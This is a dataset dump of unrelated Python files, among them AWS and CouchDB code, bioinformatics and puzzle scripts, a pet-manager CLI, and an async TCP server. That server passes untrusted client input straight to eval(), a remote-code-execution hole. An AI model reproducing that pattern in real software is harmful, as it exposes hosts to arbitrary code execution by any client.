copy of the\n# License is located at\n#\n#\t http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\n\"\"\"Integration tests for the ElasticsearchService API ElasticsearchDomain\nresource\n\"\"\"\n\nimport boto3\nimport datetime\nimport pytest\nimport logging\nimport time\nfrom typing import Dict\n\nfrom acktest.k8s import resource as k8s\n\nfrom e2e import service_marker, CRD_GROUP, CRD_VERSION, load_resource\nfrom e2e.replacement_values import REPLACEMENT_VALUES\n\nRESOURCE_PLURAL = 'elasticsearchdomains'\n\nDELETE_WAIT_AFTER_SECONDS = 20\nCREATE_INTERVAL_SLEEP_SECONDS = 15\n# Time to wait before we get to an expected RUNNING state.\n# In my experience, it regularly takes more than 6 minutes to create a\n# single-instance RabbitMQ broker...\nCREATE_TIMEOUT_SECONDS = 600\n\n\n@pytest.fixture(scope=\"module\")\ndef es_client():\n return boto3.client('es')\n\n\n# TODO(jaypipes): Move to k8s common library\ndef get_resource_arn(self, resource: Dict):\n assert 'ackResourceMetadata' in resource['status'] and \\\n 'arn' in resource['status']['ackResourceMetadata']\n return resource['status']['ackResourceMetadata']['arn']\n\n\n@service_marker\n@pytest.mark.canary\nclass TestDomain:\n def test_create_delete_7_9(self, es_client):\n resource_name = \"my-es-domain\"\n\n replacements = REPLACEMENT_VALUES.copy()\n replacements[\"DOMAIN_NAME\"] = resource_name\n\n resource_data = load_resource(\n \"domain_es7.9\",\n additional_replacements=replacements,\n )\n logging.error(resource_data)\n\n # Create the k8s resource\n ref = k8s.CustomResourceReference(\n CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,\n resource_name, namespace=\"default\",\n )\n k8s.create_custom_resource(ref, resource_data)\n cr = k8s.wait_resource_consumed_by_controller(ref)\n\n assert cr is not None\n assert k8s.get_resource_exists(ref)\n\n logging.info(cr)\n\n # Let's check that the domain appears in AES\n aws_res = es_client.describe_elasticsearch_domain(DomainName=resource_name)\n assert aws_res is not None\n\n now = datetime.datetime.now()\n timeout = now + datetime.timedelta(seconds=CREATE_TIMEOUT_SECONDS)\n\n # TODO(jaypipes): Move this into generic AWS-side waiter\n while aws_res['Created'] != True:\n if datetime.datetime.now() >= timeout:\n raise Exception(\"failed to find created ES Domain before timeout\")\n time.sleep(CREATE_INTERVAL_SLEEP_SECONDS)\n aws_res = es_client.describe_elasticsearch_domain(DomainName=resource_name)\n assert aws_res is not None\n\n # Delete the k8s resource on teardown of the module\n k8s.delete_custom_resource(ref)\n\n time.sleep(DELETE_WAIT_AFTER_SECONDS)\n\n # Domain should no longer appear in AES\n res_found = False\n try:\n es_client.describe_elasticsearch_domain(DomainName=resource_name)\n res_found = True\n except es_client.exceptions.NotFoundException:\n pass\n\n assert res_found is False\n","sub_path":"test/e2e/tests/test_elasticsearch_domain.py","file_name":"test_elasticsearch_domain.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"558615925","text":"from libraries.couchdb import Couchdb\nfrom flask import session\n\nimport json\n\nclass SearchModel(object):\n\tdef __init__(self):\n\t\tsuper(SearchModel, self).__init__()\n\t\tself.db = Couchdb('inventory')\n\n\tdef findSuppliers(self,q):\n\t\tobj = {\n\t\t\t'selector': {\n\t\t\t\t'$and':[\n\t\t\t\t\t{'user':session['_id']},\n\t\t\t\t\t{'doc_type':'supplier'},\n\t\t\t\t\t{'name': {'$lte':q} }\n\t\t\t\t]\n\t\t\t},\n\t\t\t'fields': ['name', '_rev','_id'],\n\t\t}\n\n\t\tdata = self.db.find(obj)\n\n\t\treturn data\n\n\tdef findProducts(self,q):\n\t\tobj = {\n\t\t\t'selector': {\n\t\t\t\t'$and':[\n\t\t\t\t\t{'user':session['_id']},\n\t\t\t\t\t{'doc_type':'product'},\n\t\t\t\t\t{'name': {'$lte':q} }\n\t\t\t\t]\n\t\t\t},\n\t\t\t'fields': ['name', '_rev','_id'],\n\t\t}\n\n\t\tdata = self.db.find(obj)\n\n\t\treturn data","sub_path":"models/SearchModel.py","file_name":"SearchModel.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"231373667","text":"import subprocess as sp\nimport sys,os,time,re\nfrom collections import defaultdict\n\n\nclass Blast(object):\n\n \"\"\"\n Document this class\n \"\"\"\n\n def __init__(self,fasta_in,dbt,query,out = 'blastout.txt'):\n self.subject = fasta_in\n self.dbtype = dbt\n self.query = query\n self.outfile = out\n\n def makedb(self,force = False):\n \"\"\"Create a custom database from a multi-FASTA file of sequences with this minimal command:\n makeblastdb -in mydb.fsa dbtype nucl -parse_seqids\n subprocess.Popen requires a list of arguments\"\"\"\n print (\"Creating goddamn subject database...get stoked\")\n print (os.path.isfile(self.subject + \".nhr\") and os.path.isfile(self.subject + \".nin\") and os.path.isfile(self.subject + \".nsq\"))\n\n if (os.path.isfile(self.subject + \".nhr\") and os.path.isfile(self.subject + \".nin\") and os.path.isfile(self.subject + \".nsq\")) or force:\n return \"Database already exists continuing\"\n else:\n sp.Popen(['./ncbi-blast-2.9.0+/bin/makeblastdb','-in',self.subject,'-dbtype',self.dbtype]).wait()\n\n return \"Finished creating blastdb my guy\"\n\n def blast(self):\n \"\"\"\n\n Run blastn or blastp\n\n Parameters for -db and -query are provided by the class instance\n\n \"\"\"\n\n print(\"Running blast... OK dude, please chill\")\n start = time.time()\n\n #use blastn\n if self.dbtype == \"nucl\":\n \tsp.Popen(['./ncbi-blast-2.9.0+/bin/blastn','-db',self.subject,'-query',self.query,'-outfmt','7 stitle qstart sstart qend send qcovs qseqid','-out',self.outfile]).wait()\n #use blastp\n elif self.dbtype == \"prot\":\n sp.Popen(['./ncbi-blast-2.9.0+/bin/blastp','-db',self.subject,'-query',self.query,'-outfmt','7 stitle qstart sstart qend send qcovs qseqid','-out',self.outfile]).wait()\n\n end = time.time()\n\n return \"Done running blast in %0.6f seconds\" % (end - start)\n\nclass BlastReport(object):\n\n def __init__(self,blastresfile = 'blastout.txt'):\n self.file = blastresfile\n self.results = []\n self.parse() #call parse when new instance of the class is created\n\n def parse(self):\n find_query = re.compile(\"#\\sQuery:\\s.*\").search #regex\n pos = -1\n\n with open(self.file) as fh:\n for line in fh:\n if find_query(line):\n query = re.sub(\"#\\sQuery:\\s\",\"\",line)\n result_dict = defaultdict(defaultdict)\n self.results.append(result_dict)\n pos += 1\n elif line.startswith(\"#\"):\n continue\n else:\n line = line.split('\\t')\n self.results[pos][query][line[0]] = {'query_coords': line[1] + \":\" + line[3],\n 'subject_coords' : line[2] + \":\" + line[4],\n 'percent_query_coverage' : line[5] }\n print(self.results)\n\n def qcovs(self):\n #this takes the data that was parsed from the blast report and returns the percent query coverage\n qcov_list = []\n for result in self.results:\n for query in result:\n for subject in result[query]:\n qcov_list.append((query,subject,result[query][subject]['percent_query_coverage']))\n return qcov_list\n\ndef main():\n query = \"random.fna\" #this will be the file from dinucleotie program\n subject = \"./dbs/Actino_DB\" #I hard coded this path so change it to make it work, wilson changed\n dbt = \"nucl\"\n outfile = \"practice.out\" #random ass outfile name\n useblast = Blast(subject,dbt,query,outfile)\n useblast.makedb()\n useblast.blast()\n blast_results = BlastReport()\n\nif __name__ == '__main__':\n main()\n","sub_path":"blast.py","file_name":"blast.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"596899236","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 8 21:06:39 2020\n\n@author: laura\n\"\"\"\n\n#%% IMPORTS\nimport pandas as pd\nimport re\nimport regex as re2\n#%% DATA\ndata = []\nwith(open(\"Data - Day07.txt\", \"r\")) as file:\n for line in file:\n data.append(line.strip())\n\n#%% GOAL 1\n\"\"\"While snooping around the local network of EBHQ, you compile a list of IP addresses (they're IPv7, of course; IPv6 is much too limited). You'd like to figure out which IPs support TLS (transport-layer snooping).\n\nAn IP supports TLS if it has an Autonomous Bridge Bypass Annotation, or ABBA. An ABBA is any four-character sequence which consists of a pair of two different characters followed by the reverse of that pair, such as xyyx or abba. However, the IP also must not have an ABBA within any hypernet sequences, which are contained by square brackets.\"\"\"\n\n#%% SOLUTION 1\ndef SplitLines(line):\n lst = re.split(r'\\[|\\]', line)\n return lst[1::2], lst[::2]\n\ndef CheckABBA(string):\n return any(i != j for i, j in re2.findall(r'(.)(.)\\2\\1', string, overlapped=True))\n\nnum = 0\nfor i in data:\n inside, outside = SplitLines(i)\n if any(CheckABBA(j) for j in outside) and not any(CheckABBA(j) for j in inside):\n num += 1\n\nprint(num)\n\n#%% GOAL 2\n\"\"\"You would also like to know which IPs support SSL (super-secret listening).\n\nAn IP supports SSL if it has an Area-Broadcast Accessor, or ABA, anywhere in the supernet sequences (outside any square bracketed sections), and a corresponding Byte Allocation Block, or BAB, anywhere in the hypernet sequences. An ABA is any three-character sequence which consists of the same character twice with a different character between them, such as xyx or aba. A corresponding BAB is the same characters but in reversed positions: yxy and bab, respectively.\n\nHow many IPs in your puzzle input support SSL?\"\"\"\n\n#%% SOLUTION 2\ndef CheckABAandBAB(string):\n bab_aba = []\n for i,j in re2.findall(r'(.)(.)\\1', string, overlapped=True):\n if i != j:\n bab_aba.append(j+i+j)\n return bab_aba\n\n\ncount = 0\nfor line in data:\n inside, outside = SplitLines(line)\n babs = []\n for k in inside:\n for bab in CheckABAandBAB(k):\n babs.append(bab)\n\n lst = []\n for bab in babs:\n for m in outside:\n if bab in m:\n lst.append(True)\n\n if any(lst):\n count +=1\nprint(count)\n","sub_path":"Day07.py","file_name":"Day07.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"199235518","text":"from collections import defaultdict\n\nname = input()\nans = ''\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\ntmp = 0\n\ndic = defaultdict(int)\nfor c in name:\n dic[c] += 1\n\n#palindrome check\nif len(name) % 2 == 0: #글자수가 짝수인 경우\n val = dic.values()\n for x in val:\n if x % 2 == 1:\n ans = \"I'm Sorry Hansoo\"\n break\n\nelse: #글자수가 홀수인 경우\n val = dic.items()\n cnt = 0\n for k, v in val:\n if v % 2 == 1 and cnt == 0:\n cnt += 1\n tmp = k\n elif v % 2 == 1 and cnt > 0:\n ans = \"I'm Sorry Hansoo\"\n break\n\n#팰린드롬일때, 알파벳 개수를 돌면서 추출하기\nif len(ans) == 0:\n for x in alphabet:\n if dic[x]:\n ans += x * int(dic[x] // 2)\n ans2 = ans[::-1]\n if tmp: #홀수일경우\n ans += tmp\n ans += ans2\nprint(ans)\n","sub_path":"susie/BOJ/20220701_1213_팰린드롬만들기.py","file_name":"20220701_1213_팰린드롬만들기.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"343721336","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/3/29 下午2:06\n# @Author : yizhen\n# @Site : \n# @File : get_data.py\n# @Software: PyCharm\n\n# 得到不同条目的知识库,里面包含gold的知识库,用来测试条目的数据对最终结果的影响\n\nimport argparse\nimport random\n\nimport torch\nimport logging\nimport json\nimport codecs\n\ndef add_data(normal, navigate, num):\n \"\"\"\n\n :param normal:\n :param navigate:\n :param num:\n :return:\n \"\"\"\n count = 1\n items = normal['scenario']['kb']['items']\n navigate_item = navigate['scenario']['kb']['items'][0]\n\n for index, content in enumerate(items):\n if content['poi'] != navigate_item['poi'] and content['address'] != navigate_item['address']:\n navigate['scenario']['kb']['items'].append(content)\n count +=1\n if(count == num):\n return navigate\n print(\"count:{0}\".format(count))\n return navigate\n\n\ndef process_data(args):\n \"\"\"\n return new data\n :param args:\n :return:\n \"\"\"\n res_navigate = []\n num = args.num # 代表要总共是几个数\n origin_navigate_path, origin_all_path, output_path = args.origin_navigate_path, args.origin_all_path, args.output_path\n with codecs.open(origin_navigate_path, 'r', encoding='utf-8') as fp_navigate:\n with codecs.open(origin_all_path, 'r', encoding = 'utf-8') as fp_all:\n navigate = json.loads(fp_navigate.read())\n all = json.loads(fp_all.read())\n # print(len(navigate))\n count = -1\n for index, content_origin in enumerate(all): # 从all入手\n res = []\n if content_origin['scenario']['task']['intent'] == 'navigate':\n count += 1\n res = add_data(content_origin, navigate[count], num)\n res_navigate.append(res)\n\n with codecs.open(output_path, 'w', encoding='utf-8') as fp_out:\n fp_out.write(json.dumps(res_navigate, indent=2))\n\n\ndef main():\n cmd = argparse.ArgumentParser(\"sentence_representation_library\")\n cmd.add_argument(\"--origin_navigate_path\", help='train data_path', type=str, default='./data/navigate_dev_public.json')\n cmd.add_argument(\"--origin_all_path\", help='train data_path', type=str,default='./data/kvret_dev_public.json')\n cmd.add_argument(\"--output_path\", help='train data_path', type=str,default='./data/origin_new_navigate_dev_public.json')\n cmd.add_argument(\"--num\", help='num', type=int,default='4')\n\n args = cmd.parse_args()\n process_data(args)\n\nif __name__ == '__main__':\n main()","sub_path":"scripts/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"602328163","text":"from exceptions import ValueError\nfrom operator import itemgetter\nfrom accelidsr.mod_idsrentry.models.idsr import Idsr\n\n_stepforms = {}\n\n\ndef registerStepForm(clazz, step, substep=1):\n \"\"\"\n Registers the Form to be dynamically loaded for a given step and substep.\n As an example, given a form with a name IdsrEntryStepA2Form, the value for\n the param 'step' would probably be 'A' and substep=2\n\n :param clazz: the type of the FlaskForm to to be instantiated\n :type clazz: type of FlaskForm\n :param step: the step for which the passed in type of form must be loaded\n :type step: string\n :param substep: the substep for which the passed in type of form and passed\n in step must be loaded\n :type substep: int\n \"\"\"\n idstep = step[0].lower()\n idsubstep = str(substep)\n if idstep not in _stepforms:\n _stepforms[idstep] = {'substeps': {}, 'title': step[1]}\n _stepforms[idstep]['substeps'][idsubstep] = clazz\n\n\ndef _getRegisteredStepForm(step, substep=1):\n \"\"\"\n Private function that returns the type of Form to be loaded when the passed\n in step and substep are requested\n\n :param step: the step for which the passed in type of form must be loaded\n :type step: string\n :param substep: the substep for which the passed in type of form and passed\n in step must be loaded\n :type substep: int\n :returns: the type of the Form to be loaded\n :rtype: type of FlaskForm\n \"\"\"\n substeps = _stepforms.get(step.lower(), {'substeps': {}})\n clazz = substeps['substeps'].get(str(substep), None)\n if clazz:\n return clazz\n raise ValueError(\"No form registered for step '{0}.{1}'\"\n .format(step, str(substep)))\n\n\ndef getStepIds(clazzname):\n \"\"\"\n Return a 2-tuple. The first item is the step and the second item is substep\n associated to the passed in type name. If no type has been registered\n previously for the passed in clazzname, raises a ValueError.\n\n :param clazzname: the type of the form from which the 2-tuple with the step\n and substep must be retrieved.\n :type clazzname: the type of the Form to be loaded\n :rtype: type of FlaskForm\n \"\"\"\n for k, v in _stepforms.items():\n for y, z in v['substeps'].items():\n if z.__name__ == clazzname:\n return (k, y)\n raise ValueError(\"No form registered for '{0}}'\".format(clazzname))\n\n\ndef getAvailableSteps():\n \"\"\"\n Returns a list that contains all the available steps and substeps\n registered previously in the system through the function registerStepForm,\n sorted by id ascending. E.g: ['a','b','c','d']\n\n :returns: a list with the registered top-level steps, sorted by id asc\n :rtype: A list of strings\n \"\"\"\n steps = [{'id': k, 'title': v['title']} for k, v in _stepforms.items()]\n sortedlist = sorted(steps, key=itemgetter('id'), reverse=False)\n return sortedlist\n\n\ndef getAvailableSubsteps(step):\n \"\"\"\n Returns the list of substeps registered for the passed in step.\n :param step: the step from which the substeps must be retrieved\n :type step: string\n :returns: the list of substeps associated to the passed in step\n :rtype: A list of strings\n \"\"\"\n return _stepforms.get(step.lower(), {'substeps': {}})['substeps']\n\n\ndef getStepTitle(step):\n \"\"\"\n Returns the title associated to the passed in step\n :param step: te step from which the associated title must be retrieved\n :type step: string\n :returns: The title associated to the passed in step\n :rtype: string\n \"\"\"\n return _stepforms.get(step.lower(), {'title': ''}).get('title', '')\n\n\ndef getNextStepId(step, substep=None):\n \"\"\"\n Returns the next step (and/or substep) that follows the step (and substep)\n passed in. If the substep passed in is the last substep from the step, the\n function will return the first substep of the next available step, but only\n if the passed in step is not the last step from within a sequence.\n Otherwise, returns an empty string.\n As an example if step='b' and substep=2, the function will return 'b_3'. If\n there is no substep 3 for b, then will return c_1. If in turn, there is no\n step 'c' registered, then will return ''\n\n :param step: the current step\n :type step: string\n :param substep: the current substep.\n :type substep: int\n :returns: The next step id that follows the current step and substep\n :rtype: string\n \"\"\"\n if not step:\n raise ValueError(\"No step passed in\")\n substep = substep if substep else 1\n substeps = getAvailableSubsteps(step)\n if substeps:\n sortedss = sorted(substeps.keys())\n pos = [i for i, x in enumerate(sortedss) if x == str(substep)]\n if pos and pos[0] < (len(sortedss) - 1):\n return '{0}_{1}'.format(step.lower(), sortedss[pos[0] + 1])\n # The substep passed in is the last one from the step. Return the first\n # substep from the next top-level step\n steps = [k['id'] for k in getAvailableSteps()]\n pos = [i for i, x in enumerate(steps) if x == str(step)]\n if pos and pos[0] < (len(steps) - 1):\n return '{0}'.format(steps[pos[0]+1])\n # Ooops, we reached the end of the wizard form. No further step, return 0\n return ''\n\n\ndef getPrevStepId(step, substep=None):\n \"\"\"\n Returns the previous step (and/or substep) before the step (and substep)\n passed in. If the substep passed in is the first substep from the step, the\n function will return the last substep of the previous available step, but\n only if the passed in step is not the first step from within a sequence.\n Otherwise, returns an empty string.\n As an example if step='b' and substep=2, the function will return 'b_1'. If\n step='a' and substep='1', then will return ''\n\n :param step: the current step\n :type step: string\n :param substep: the current substep.\n :type substep: int\n :returns: The next step id before the current step and substep\n :rtype: string\n \"\"\"\n if not step:\n raise ValueError(\"No step passed in\")\n if not substep:\n substep = 1\n substeps = getAvailableSubsteps(step)\n if len(substeps) > 1:\n sortedss = sorted(substeps.keys())\n pos = [i for i, x in enumerate(sortedss) if x == str(substep)]\n if pos and pos[0] > 0:\n return '{0}_{1}'.format(step.lower(), sortedss[pos[0] - 1])\n # The substep passed in is the first one from the step. Return the last\n # substep from the previous top-level step\n steps = [k['id'] for k in getAvailableSteps()]\n pos = [i for i, x in enumerate(steps) if x == str(step)]\n if pos and pos[0] > 0:\n prevstep = steps[pos[0] - 1]\n substeps = getAvailableSubsteps(prevstep)\n if substeps:\n sortedss = sorted(substeps.keys())\n return '{0}_{1}'.format(prevstep, sortedss[-1:][0])\n return '{0}'.format(prevstep)\n # Ooops, we reached the end of the wizard form. No further step, return 0\n return ''\n\n\ndef newStepFormInstance(step, substep=1):\n \"\"\"\n Returns an instance of the FlaskForm associated to the step and substep\n passed in that were registered previously through registerStepForm function\n\n :param step: the step associated to the form to be instantiated.\n :type step: string\n :param substep: the substep associated to the form to be instantiated\n :type substep: int\n :returns: The instance of the FlaskForm associated to the step and substep\n passed in\n :rtype: a FlaskForm object\n \"\"\"\n clazz = _getRegisteredStepForm(step, substep)\n obj = clazz()\n obj.initDefaults()\n return obj\n\n\ndef loadStepFormInstance(requestform=None):\n \"\"\"\n Returns an instance of the FlaskForm associated to the step and substep\n passed as parameters in the request form ('stepform' and 'substepform').\n If the keys 'stepform' and 'substepform' are not found in the passed in\n requestform, returns the instance associated to the first step (A.1)\n\n :param requestform: the request's where the desired step and substep for\n obtaining the FlaskForm to be instantiated are defined.\n :returns: The instance of the FlaskForm associated to the step and substep\n passed in via the requestform\n :rtype: a FlaskForm object\n \"\"\"\n if requestform is None:\n raise NotImplementedError(\"No requestform object passed in\")\n # By default, set A.1 as fallback\n step = requestform.get('stepform', 'A')\n substep = requestform.get('substepform', 1)\n clazz = _getRegisteredStepForm(step, substep)\n obj = clazz(requestform)\n idobj = requestform.get('idobj', '')\n if idobj:\n idsrobj = Idsr.fetch(idobj)\n idsrobj.update(requestform)\n obj.setIdsrObject(idsrobj)\n return obj\n\n\n# Import custom forms to be loaded dynamically here\nfrom accelidsr.mod_idsrentry.forms import a\nfrom accelidsr.mod_idsrentry.forms import b\nfrom accelidsr.mod_idsrentry.forms import c\nfrom accelidsr.mod_idsrentry.forms import d\n","sub_path":"accelidsr/mod_idsrentry/forms/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"573914109","text":"import sys\r\nfrom labjack import ljm\r\nimport sd_util\r\n\r\n\r\ndef usage():\r\n print('Usage: %s' % (sys.argv[0]))\r\n exit()\r\n\r\n\r\nif len(sys.argv) != 1:\r\n print('No arguments are allowed')\r\n usage()\r\n\r\nhandle = sd_util.openDevice()\r\nprint(sd_util.getCWD(handle))\r\nljm.close(handle)\r\n","sub_path":"Examples/More/SD/print_working_directory.py","file_name":"print_working_directory.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"293227717","text":"#coding: utf-8\nPETS = []\nFILENAME = 'pets.txt'\n\ntry:\n\twith open(FILENAME,'r',encoding=\"utf-8\") as fp:\n\t\tfor line in fp:\n\t\t\tinfo = line.split('/')\n\t\t\tID = info[0]\n\t\t\tname = info[1]\n\t\t\tcategory = info[2]\n\t\t\tprice = info[3]\n\t\t\tPETS.append({'id':ID,'name':name,'category':category,'price':price})\n\n\nexcept FileNotFoundError:\n\t# print(\"文件不存在!\")\n\tfp = open(FILENAME,'w',encoding='utf-8')\n\tfp.close()\n\ndef add_pet():\n\tID = input(\"请输入编号:\").strip()\n\tname = input(\"请输入宠物名称:\").strip()\n\tcategory = input(\"请输入宠物种类:\").strip()\n\tprice = input(\"请输入宠物价格\").strip()\n\tpet = {\"id\":ID,\"name\":name,\"category\":category,\"price\":price}\n\tPETS.append(pet)\n\tprint(\"宠物添加成功\")\n\ndef search_pet():\n\tname = input(\"请输入宠物名称:\").strip()\n\tfor pet in PETS:\n\t\tif pet['name'] == name:\n\t\t\ttext = \"编号:{},名称:{},种类{},价格:{}\".format(\n\t\t\t\t\tpet[\"id\"],\n\t\t\t\t\tpet[\"name\"],\n\t\t\t\t\tpet[\"category\"],\n\t\t\t\t\tpet[\"price\"],\n\t\t\t\t)\n\t\t\tprint(pet)\n\ndef delete_pet():\n\tID = input(\"请输入编号:\").strip()\n\tfor pet in PETS:\n\t\tif pet['id'] == ID:\n\t\t\tPETS.remove(pet)\n\t\t\tprint(\"恭喜,删除成功\")\n\t\t\tbreak\n\ndef list_pet():\n\tfor pet in PETS:\n\t\ttext = \"编号:{},名称:{},种类{},价格:{}\".format(\n\t\t\t\tpet['id'],\n\t\t\t\tpet['name'],\n\t\t\t\tpet['category'],\n\t\t\t\tpet['price'],\n\t\t\t)\n\t\tprint(text)\n\ndef exit_program():\n\twith open(FILENAME,'w',encoding='utf-8') as fp:\n\t\tlines = []\n\t\tfor pet in PETS:\n\t\t\ttext = \"{ID}/{name}/{category}/{price}\".format(\n\t\t\t\t\tID = pet['id'],\n\t\t\t\t\tname = pet['name'],\n\t\t\t\t\tcategory = pet['category'],\n\t\t\t\t\tprice = pet['price']\n\t\t\t)\n\t\t\tlines.append(text+'\\n')\n\t\tfp.writelines(lines)\n\ndef main():\n\tprint(\"=\"*30)\n\tprint(\"1. 添加宠物\")\n\tprint(\"2. 查找宠物\")\n\tprint(\"3. 删除宠物\")\n\tprint(\"4. 列出宠物\")\n\tprint(\"5. 退出程序\")\n\tprint(\"=\"*30)\n\twhile True:\n\t\toption = input(\"请输入选项\").strip()\n\t\tif option == \"1\":\n\t\t\tadd_pet()\n\t\telif option == \"2\":\n\t\t\tsearch_pet()\n\t\telif option == \"3\":\n\t\t\tdelete_pet()\n\t\telif option == \"4\":\n\t\t\tlist_pet()\n\t\telif option == \"5\":\n\t\t\texit_program()\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"请输入正确的选项\")\n\nmain()","sub_path":"basic/day7/homework/02_pet_manager.py","file_name":"02_pet_manager.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"515570111","text":"import os\nimport time\nimport random\n\n\ndef play():\n while True:\n times = random.randint(5, 15)\n print(times)\n time.sleep(times)\n os.system('adb shell input tap 520 2000')\n times2 = random.randint(3, 6)\n print(times2)\n time.sleep(times2)\n os.system('adb shell input tap 520 2000')\n\n\nplay()\n","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"402883755","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport errno\nimport signal\nimport select\nimport socket\nimport logging\nimport time\n\n\nlogger = logging.getLogger('main')\n\n\nBIND_ADDRESS = ('localhost', 8999)\nBACKLOG = 5\n\n\nclass Handler:\n\n def __init__(self, sock, clinet_ip, client_port):\n self.log('Start to process request from %s:%d' % (clinet_ip, client_port))\n self.sock = sock\n self.ready_to_read = True\n self.ready_to_write = False\n self.i_am_done = False\n self.in_buffer = b''\n self.out_buffer = b''\n self.wait_until = 1e10 # недостижимое время\n\n def log(self, message):\n logger.info('[id=%d] %s' % (id(self), message))\n\n def get_data_from_socket(self):\n while True:\n chank = self.sock.recv(1024)\n self.in_buffer += chank\n if len(chank) < 1024:\n break\n if self.in_buffer.endswith(b'\\n'):\n self.log('In buffer collected: ' + repr(self.in_buffer))\n self.ready_to_read = False\n # ждём 5 секунд (изображаем обращение к внешнему процессу)\n self.wait_until = time.time() + 5\n\n def time_tick(self):\n if time.time() < self.wait_until:\n return\n # получаем результат\n try:\n result = str(eval(self.in_buffer, {}, {}))\n except Exception as e:\n result = repr(e)\n self.out_buffer = result.encode('utf-8') + b'\\r\\n'\n self.log('Out buffer ready: ' + repr(self.out_buffer))\n # выставляем флаг, что мы готовы отдавать результат\n self.ready_to_write = True\n\n def write_data_to_socket(self):\n n = self.sock.send(self.out_buffer)\n if n == len(self.out_buffer):\n # все отправлено\n self.log('Done.')\n self.i_am_done = True\n self.ready_to_write = False\n self.sock.close()\n else:\n # удаляем часть буфера, которая уже отправлена\n self.out_buffer = self.out_buffer[n:]\n\n\nclass Listner:\n\n def __init__(self, sock):\n self.ready_to_read = True\n self.ready_to_write = False\n self.i_am_done = False\n\n def time_tick(self):\n pass # затычка для совместимости\n\n\n# глобальная карта соответствия fileno <-> объект_обработчик\nsocket_map = {}\n\n\ndef serve_forever():\n # создаём слушающий сокет\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # re-use port\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(BIND_ADDRESS)\n sock.listen(BACKLOG)\n # слушаем и при получении нового входящего соединения,\n # порождаем объект Handler, который будет его обрабатывать\n logger.info('Listning no %s:%d...' % BIND_ADDRESS)\n # добавляем наш слушающий сокет в карту\n # обернув его в Listner для обеспечения единого интерфейса\n # всех объектов-контекстов\n socket_map[sock.fileno()] = Listner(sock)\n while True:\n # собираем все сокеты, для которых\n # есть операции, ожидающие чтения или записи\n to_read = []\n to_write = []\n for fileno, obj in socket_map.items():\n obj.time_tick()\n if obj.ready_to_read:\n to_read.append(fileno)\n if obj.ready_to_write:\n to_write.append(fileno)\n # проверяем фактическое состояние сокета и его\n # готовность к вводу-выводу\n has_data_to_read, waiting_for_writing, errors = select.select(\n to_read, to_write, [], 1)\n # обрабатываем все чтения\n for fileno in has_data_to_read:\n obj = socket_map[fileno]\n # проверяем тип сокета\n if type(obj) is Listner:\n # мы получили новое входящее соединение\n try:\n connection, (client_ip, clinet_port) = sock.accept()\n except IOError as e:\n if e.errno == errno.EINTR:\n continue\n raise\n # не блокирующий\n connection.setblocking(0)\n # cоздаём новый объект для асинхронного\n # обслуживания соединения\n socket_map[connection.fileno()] = Handler(\n connection,\n client_ip,\n clinet_port)\n else:\n # мы получили данные\n obj.get_data_from_socket()\n # обрабатываем все записи (тут всё просто, альтернатив нет)\n for fileno in waiting_for_writing:\n socket_map[fileno].write_data_to_socket()\n # удаляем все обработчики, которые завершили свою работу\n to_delete = []\n for fileno, obj in socket_map.items():\n if obj.i_am_done:\n to_delete.append(fileno)\n for fileno in to_delete:\n del socket_map[fileno]\n\n\ndef main():\n # настраиваем логгинг\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n '%(asctime)s [%(levelname)s] %(message)s',\n '%H:%M:%S'\n )\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logger.info('Run')\n # запускаем сервер\n serve_forever()\n\n\nmain()","sub_path":"elemetory/assyncserver.py","file_name":"assyncserver.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"154354995","text":"#!/usr/bin/python3\n\n## dependencies\nfrom pylab import *\nimport matplotlib as mplt\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport math\nimport argparse\nfrom module_getarg import getarg\nfrom matplotlib.collections import LineCollection, PolyCollection\nfrom matplotlib import colors\nfrom matplotlib.colors import colorConverter\nfrom argparse import RawTextHelpFormatter\nfrom module_io import *\n\n# ignore warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\", module=\"matplotlib\")\n\n# tag\nprogram = 'volcon'\nprint()\n\n# read arguments\nparser = 